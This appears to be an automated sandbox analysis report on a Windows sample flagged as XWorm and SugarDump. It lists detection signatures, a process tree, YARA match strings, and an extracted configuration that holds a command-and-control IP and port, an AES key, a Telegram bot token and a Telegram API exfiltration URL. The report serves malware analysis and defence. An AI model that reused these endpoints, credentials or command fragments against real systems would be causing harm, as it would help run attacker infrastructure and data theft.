Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe
Analysis ID:	1639673
MD5:	0cf12da421ee4ddc57b9f5560cba9a64
SHA1:	950c2a34ff280166140d6447c688529d8a13aed0
SHA256:	31e63f819a36bc1e4ddca8afbab6997fac0aefd1b7c5628273459f641bbfac85
Tags:	exeuser-SecuriteInfoCom
Infos:

Detection

SugarDump, XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected SugarDump

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to capture screen (.Net source)

Contains functionality to inject code into remote processes

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Potentially Suspicious Malware Callback Communication

Tries to harvest and steal browser information (history, passwords, etc)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)

SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 6296 cmdline: "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)

RegAsm.exe (PID: 5384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB64.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7616 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 5604 cmdline: "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)

RegAsm.exe (PID: 660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe (PID: 1572 cmdline: "C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe" MD5: 0CF12DA421EE4DDC57B9F5560CBA9A64)

MSBuild.exe (PID: 944 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SUGARDUMP	According to Mandiant, SUGARDUMP is a credential harvesting utility, capable of password collection from Chromium-based browsers. There are also versions to exfiltrate data via SMTP and HTTP.	No Attribution	https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping	https://malpedia.caad.fkie.fraunhofer.de/details/win.sugardump

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["38.68.49.150"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8", "Telegram Chatid": "-4763076882", "Version": "XWorm V5.6"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7679784649:AAH3qQDuOx-OKMgB6WakdqTj8E2yKjPH8Q8/sendMessage"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8734:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x87d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x88e6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x82c6:$cnc4: POST / HTTP/1.1
00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x82f4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13574:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8391:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13611:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x84a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13726:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7e86:$cnc4: POST / HTTP/1.1 0x13106:$cnc4: POST / HTTP/1.1
00000003.00000002.1458106841.0000000007C30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
00000003.00000002.1455196858.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9574:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9611:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9726:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9106:$cnc4: POST / HTTP/1.1
00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8971:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8a86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8466:$cnc4: POST / HTTP/1.1
00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9574:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9611:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9726:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9106:$cnc4: POST / HTTP/1.1
00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7ff4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13274:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8091:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13311:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x81a6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13426:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7b86:$cnc4: POST / HTTP/1.1 0x12e06:$cnc4: POST / HTTP/1.1
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 5384	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegAsm.exe PID: 5384	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 5384	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
3.2.RegAsm.exe.7c30000.2.unpack	JoeSecurity_SugarDump	Yara detected SugarDump	Joe Security
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.RegAsm.exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x6e76:$str01: $VB$Local_Port 0x6e67:$str02: $VB$Local_Host 0x70d3:$str03: get_Jpeg 0x6b52:$str04: get_ServicePack 0x7f54:$str05: Select * from AntivirusProduct 0x8152:$str06: PCRestart 0x8166:$str07: shutdown.exe /f /r /t 0 0x8218:$str08: StopReport 0x81ee:$str09: StopDDos 0x82e4:$str10: sendPlugin 0x8482:$str12: -ExecutionPolicy Bypass -File " 0x85ab:$str13: Content-length: 5235
3.2.RegAsm.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8934:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ae6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84c6:$cnc4: POST / HTTP/1.1
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x6e76:$str01: $VB$Local_Port 0x6e67:$str02: $VB$Local_Host 0x70d3:$str03: get_Jpeg 0x6b52:$str04: get_ServicePack 0x7f54:$str05: Select * from AntivirusProduct 0x8152:$str06: PCRestart 0x8166:$str07: shutdown.exe /f /r /t 0 0x8218:$str08: StopReport 0x81ee:$str09: StopDDos 0x82e4:$str10: sendPlugin 0x8482:$str12: -ExecutionPolicy Bypass -File " 0x85ab:$str13: Content-length: 5235
4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8934:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ae6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84c6:$cnc4: POST / HTTP/1.1
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5076:$str01: $VB$Local_Port 0x5067:$str02: $VB$Local_Host 0x52d3:$str03: get_Jpeg 0x4d52:$str04: get_ServicePack 0x6154:$str05: Select * from AntivirusProduct 0x6352:$str06: PCRestart 0x6366:$str07: shutdown.exe /f /r /t 0 0x6418:$str08: StopReport 0x63ee:$str09: StopDDos 0x64e4:$str10: sendPlugin 0x6682:$str12: -ExecutionPolicy Bypass -File " 0x67ab:$str13: Content-length: 5235
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6b34:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6bd1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6ce6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x66c6:$cnc4: POST / HTTP/1.1
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x6e76:$str01: $VB$Local_Port 0x6e67:$str02: $VB$Local_Host 0x70d3:$str03: get_Jpeg 0x6b52:$str04: get_ServicePack 0x7f54:$str05: Select * from AntivirusProduct 0x8152:$str06: PCRestart 0x8166:$str07: shutdown.exe /f /r /t 0 0x8218:$str08: StopReport 0x81ee:$str09: StopDDos 0x82e4:$str10: sendPlugin 0x8482:$str12: -ExecutionPolicy Bypass -File " 0x85ab:$str13: Content-length: 5235
7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8934:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x89d1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ae6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84c6:$cnc4: POST / HTTP/1.1
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x6e76:$str01: $VB$Local_Port 0x6e67:$str02: $VB$Local_Host 0x70d3:$str03: get_Jpeg 0x6b52:$str04: get_ServicePack 0x7f54:$str05: Select * from AntivirusProduct 0x8152:$str06: PCRestart 0x8166:$str07: shutdown.exe /f /r /t 0 0x8218:$str08: StopReport 0x81ee:$str09: StopDDos 0x82e4:$str10: sendPlugin 0x8482:$str12: -ExecutionPolicy Bypass -File " 0x85ab:$str13: Content-length: 5235
